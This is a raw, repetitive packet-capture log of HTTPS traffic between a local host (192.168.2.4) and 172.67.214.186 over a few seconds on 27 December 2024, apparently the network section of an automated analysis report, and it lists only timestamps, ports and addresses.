                                                                                                                                      Dec 27, 2024 10:21:59.449152946 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.449208975 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.449237108 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.449295044 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.449295044 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.454555035 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.454571009 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.454623938 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.454642057 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.454668999 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.454688072 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.460273027 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.460293055 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.460342884 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.460355997 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.460381031 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.460400105 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.466953993 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.466969013 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.467029095 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.467044115 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.467093945 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.472520113 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.472532988 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.472594976 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.472608089 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.472632885 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.472652912 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.477853060 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.477868080 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.477912903 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.477926016 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.477951050 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.477967978 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.483983994 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.484003067 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.484047890 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.484062910 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.484088898 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.484111071 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.489830017 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.489845037 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.489907026 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.489919901 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.489968061 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.650480986 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.650496960 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.650582075 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.650599003 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.650638103 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.655745029 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.655760050 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.655836105 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.655843973 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.655885935 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.661731005 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.661746025 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.661813021 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.661823034 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.661864996 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.667648077 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.667668104 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.667712927 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.667720079 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.667747974 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.667767048 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.673206091 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.673219919 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.673269987 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.673279047 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.673289061 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.673307896 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.679212093 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.679227114 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.679282904 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.679291010 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.679330111 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.684418917 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.684433937 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.684493065 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.684506893 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.684529066 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.684546947 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.690495014 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.690510988 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.690567970 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.690577984 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.690607071 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.690628052 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.851902962 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.851917028 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.851995945 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.852009058 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.854437113 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.857259989 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.857275009 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.857333899 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.857341051 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.858181000 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.863199949 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.863214970 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.863266945 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.863275051 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.865427017 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.869062901 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.869079113 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.869142056 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.869148970 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.870488882 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.874634981 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.874650955 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.874721050 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.874730110 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.878429890 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.880681992 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.880697012 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.880765915 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.880776882 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.882185936 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.885920048 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.885936022 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.886008978 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.886020899 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.886442900 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.891979933 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.891993999 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.892061949 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:59.892072916 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:59.894097090 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.053247929 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.053263903 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.053359032 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.053375959 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.054414988 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.059118986 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.059134007 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.059195042 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.059202909 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.059230089 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.059242964 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.065125942 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.065140963 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.065217972 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.065223932 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.066313028 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.070383072 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.070399046 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.070461988 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.070470095 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.072671890 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.076040030 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.076055050 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.076131105 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.076138973 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.076179981 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.082005978 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.082031012 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.082073927 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.082081079 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.082109928 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.082133055 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.087884903 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.087902069 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.087977886 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.087985992 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.090457916 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.093904018 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.093919039 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.093981981 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.093991041 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.094212055 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.255067110 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.255083084 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.255145073 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.255172968 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.257302999 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.261008024 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.261023998 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.261073112 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.261087894 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.262341022 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.266242027 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.266257048 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.266302109 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.266309977 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.266423941 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.272150040 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.272165060 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.272236109 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.272243977 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.273237944 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.277833939 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.277852058 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.277915001 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.277921915 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.278256893 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.283730984 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.283746958 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.283816099 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.283828020 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.284919977 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.289874077 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.289890051 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.289932966 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.289938927 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.290520906 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.295048952 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.295067072 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.295129061 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.295135975 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.295708895 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.456744909 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.456763029 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.456855059 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.456880093 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.458204031 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.462829113 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.462843895 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.462929964 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.462946892 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.464591026 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.468019962 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.468034983 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.468108892 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.468122959 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.470222950 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.472234964 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.472321987 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.472333908 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.472369909 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.472438097 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.477782011 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.477797985 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.477902889 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.477917910 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.478287935 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.483757973 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.483776093 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.483844042 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.483858109 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.486217022 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.489016056 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.489032030 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.489113092 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.489142895 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.490293980 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.495068073 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.495081902 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.495151997 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.495163918 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.496064901 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.656586885 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.656605959 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.656816006 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.656833887 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.656883955 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.661875963 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.661890984 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.661964893 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.661977053 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.662128925 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.667817116 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.667833090 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.667915106 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.667923927 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.670140028 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.673707962 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.673722982 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.673789978 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.673798084 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.674393892 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.679384947 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.679403067 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.679464102 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.679474115 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.682286024 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.685318947 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.685333967 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.685405016 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.685414076 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.686259985 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.690593004 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.690609932 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.690680027 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.690687895 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.694813967 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.696734905 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.696753025 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.696809053 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.696818113 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.698234081 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.857959032 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.857975006 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.858036041 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.858057976 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.858099937 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.864053965 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.864068985 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.864125013 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.864135981 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.864172935 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.869215965 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.869231939 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.869297981 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:00.869307995 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:00.869352102 CET49745443192.168.2.4172.67.214.186
